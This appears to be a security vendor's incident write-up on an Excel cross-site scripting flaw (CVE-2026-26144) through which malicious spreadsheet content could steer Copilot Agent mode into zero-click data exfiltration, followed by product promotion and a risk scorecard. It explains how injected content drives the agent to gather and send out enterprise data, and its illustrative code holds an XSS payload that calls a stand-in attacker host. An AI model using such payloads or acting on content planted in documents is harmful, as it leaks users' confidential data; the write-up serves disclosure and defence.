Spreadsheet Spycraft: Excel Copilot Zero-Click Data Leak Risk (CVE-2026-26144)
Key Takeaways
- Critical Excel vulnerability could enable zero-click data exfiltration through Copilot Agent mode.
- Attack relies on a cross-site scripting flaw that triggers unintended network requests.
- Exploitation does not require user interaction once malicious content is processed.
- Demonstrates growing security risks when AI agents interact with traditional software features.
Zero-Click Copilot Exploit Highlights New AI Application Risk
A critical vulnerability in Microsoft Excel could allow attackers to abuse Copilot Agent mode to exfiltrate sensitive data without user interaction. The issue, disclosed during Microsoft's March 2026 Patch Tuesday, combines a traditional cross-site scripting flaw with AI agent behavior. Security researchers warn that this type of attack demonstrates how AI copilots can unintentionally become channels for automated data leakage if malicious inputs manipulate their capabilities. (The Register)
What We Know
Microsoft disclosed the vulnerability, tracked as CVE-2026-26144, as part of its March 2026 Patch Tuesday security update. The flaw affects Microsoft Excel and involves improper input neutralization during web page generation that results in a cross-site scripting vulnerability. (Redmondmag)
Researchers highlighted that this vulnerability could interact with Copilot Agent mode, enabling an attacker to cause the AI assistant to transmit sensitive data over unintended network connections. The attack scenario requires network access but does not require user interaction, making it a zero-click information disclosure attack.
The vulnerability was disclosed publicly alongside dozens of other security issues addressed in Microsoft’s March update cycle. Microsoft reported that nearly eighty vulnerabilities were patched in the release, spanning multiple products including Windows, Office, and cloud services. (Cyber Security News)
At the time of disclosure, there was no confirmed evidence of active exploitation in the wild. However, security experts noted that the attack technique demonstrates a new category of vulnerabilities where AI agents can amplify the impact of traditional application bugs by automatically performing actions such as retrieving or transmitting data.
What Could Happen
The vulnerability stems from improper input handling in Excel that allows attackers to embed malicious content capable of executing in Copilot's processing context or in web-based rendering. This cross-site scripting condition could be leveraged to cause the AI agent to make outbound requests containing sensitive information.
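The underlying flaw class (improper neutralization of input during web page generation, CWE-79) can be illustrated with a minimal sketch. The function names, cell payload, and rendering flow below are hypothetical simplifications for illustration, not Excel's actual code:

```python
import html

def render_cell_unsafe(cell_value: str) -> str:
    # Vulnerable pattern: attacker-controlled cell content is interpolated
    # directly into generated HTML, so any markup it contains becomes live
    # in the page context.
    return f"<td>{cell_value}</td>"

def render_cell_safe(cell_value: str) -> str:
    # Mitigated pattern: special characters are neutralized before the
    # page is generated, so the same content renders as inert text.
    return f"<td>{html.escape(cell_value)}</td>"

# Hypothetical payload: markup that triggers an outbound request on render.
payload = '<img src=x onerror="fetch(\'https://attacker.example/leak\')">'

print(render_cell_unsafe(payload))  # markup survives, executable in a browser
print(render_cell_safe(payload))    # markup escaped to &lt;img ... (inert)
```

The same neutralization principle applies wherever spreadsheet content crosses into a rendering or agent-interpretation context.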
In practice, a malicious spreadsheet or embedded content could instruct the Copilot agent to retrieve or process data that resides in the user’s environment. Because Copilot operates with access to the user’s documents and enterprise context, this information could include internal documents, spreadsheets, or other business data accessible through Microsoft 365.
The defining feature of the attack is its zero-click nature. Once the malicious content is processed, the exploit can trigger automatically without requiring the user to click a link, approve an action, or open additional files.
The AI component significantly changes the risk profile. Traditional cross-site scripting flaws often require user interaction to trigger malicious actions. In this case, an AI agent that interprets content and initiates tasks may automatically execute the attacker’s intended workflow, effectively turning a passive vulnerability into an automated data exfiltration channel.
Why It Matters
This vulnerability highlights how AI copilots can unintentionally expand the blast radius of traditional software vulnerabilities. Tools like Copilot operate across multiple data sources and workflows, including enterprise files, collaboration platforms, and cloud services. When those agents interact with compromised content, they may automatically access and transmit sensitive information.
Even if exploitation is not confirmed, the risk is significant because many organizations rely on Microsoft Excel and Microsoft 365 as core productivity platforms. The potential exposure could include confidential financial data, intellectual property, internal reports, or other enterprise documents stored within the organization’s Microsoft environment.
More broadly, the incident illustrates a growing category of AI-enabled attack paths, where attackers manipulate AI agents indirectly through malicious content. Instead of targeting users directly, adversaries can target the systems and data sources the AI assistant can access.
As AI assistants become embedded in enterprise workflows, organizations will need to reassess trust boundaries between user inputs, application logic, and automated AI behaviors.
PointGuard AI Perspective
The Excel Copilot vulnerability highlights a broader security challenge emerging across enterprise AI deployments. AI assistants and copilots operate across multiple data sources, APIs, and enterprise systems, often with broad access to sensitive information. When traditional application vulnerabilities interact with these agents, they can create automated pathways for data exposure.
PointGuard AI helps organizations identify and mitigate these risks by providing continuous visibility and security governance across AI applications and agents. Through automated AI asset discovery and AI SBOM analysis, PointGuard AI enables security teams to understand where AI assistants interact with enterprise data, third-party tools, and external services.
PointGuard AI also enforces AI policy controls and behavioral monitoring that detect unusual agent activity, including unexpected outbound requests, suspicious data access patterns, or unauthorized integrations. This capability allows organizations to identify potential exfiltration attempts or prompt manipulation before sensitive data leaves the environment.
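Detection of unexpected outbound requests can be approximated with a simple egress-allowlist check over an agent's network activity. The allowed hosts and observed URLs below are illustrative assumptions, not PointGuard AI's actual implementation:

```python
from urllib.parse import urlparse

# Hypothetical allowlist of destinations the agent is expected to contact.
ALLOWED_HOSTS = {"graph.microsoft.com", "api.office.com"}

def flag_unexpected_egress(request_urls):
    """Return the URLs whose destination hosts fall outside the allowlist."""
    flagged = []
    for url in request_urls:
        host = urlparse(url).hostname or ""
        if host not in ALLOWED_HOSTS:
            flagged.append(url)
    return flagged

observed = [
    "https://graph.microsoft.com/v1.0/me/drive",   # expected agent traffic
    "https://attacker.example/collect?d=secrets",  # unexpected outbound request
]
print(flag_unexpected_egress(observed))
# ['https://attacker.example/collect?d=secrets']
```

In practice such checks would be one signal among many, combined with data-access patterns and agent-behavior baselines rather than a static host list.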
Additionally, PointGuard AI helps security teams evaluate how AI agents interact with documents, APIs, and enterprise workflows. By mapping these dependencies and enforcing governance policies, organizations can reduce the likelihood that malicious content or application vulnerabilities trigger unintended AI behaviors.
As AI copilots become integral to enterprise productivity tools, organizations need security controls designed specifically for AI-driven workflows. PointGuard AI provides the visibility and protection needed to enable secure and trustworthy AI adoption across modern development and productivity environments.
Incident Scorecard Details
Total AISSI Score: 6.4 / 10
- Criticality = 7: Vulnerability affects widely deployed enterprise productivity software and could expose sensitive enterprise data. AISSI weighting: 25%
- Propagation = 6: Risk could propagate through enterprise document sharing and AI-integrated workflows within Microsoft 365 environments. AISSI weighting: 20%
- Exploitability = 4: Publicly disclosed vulnerability with documented attack scenario but no confirmed exploitation reported. AISSI weighting: 15%
- Supply Chain = 7: Relies on vendor-managed AI copilots and integrated cloud productivity platforms with limited organizational control. AISSI weighting: 15%
- Business Impact = 7: High potential exposure of enterprise documents and sensitive business information if exploited. AISSI weighting: 25%
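Assuming the AISSI total is a simple weighted average of the five factor scores (the published methodology may normalize differently), the arithmetic works out as follows:

```python
# Factor scores and weights as listed in the scorecard above.
factors = {
    "Criticality":     (7, 0.25),
    "Propagation":     (6, 0.20),
    "Exploitability":  (4, 0.15),
    "Supply Chain":    (7, 0.15),
    "Business Impact": (7, 0.25),
}

total = sum(score * weight for score, weight in factors.values())
print(f"{total:.2f}")  # prints 6.35
```

Under this assumption the weighted sum is 6.35, or roughly 6.4 on a 10-point scale.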
Sources
- Microsoft Excel Copilot zero-click vulnerability report
- Microsoft March Patch Tuesday vulnerability coverage
- Technical analysis of the Excel information disclosure flaw
PointGuard AI Sources
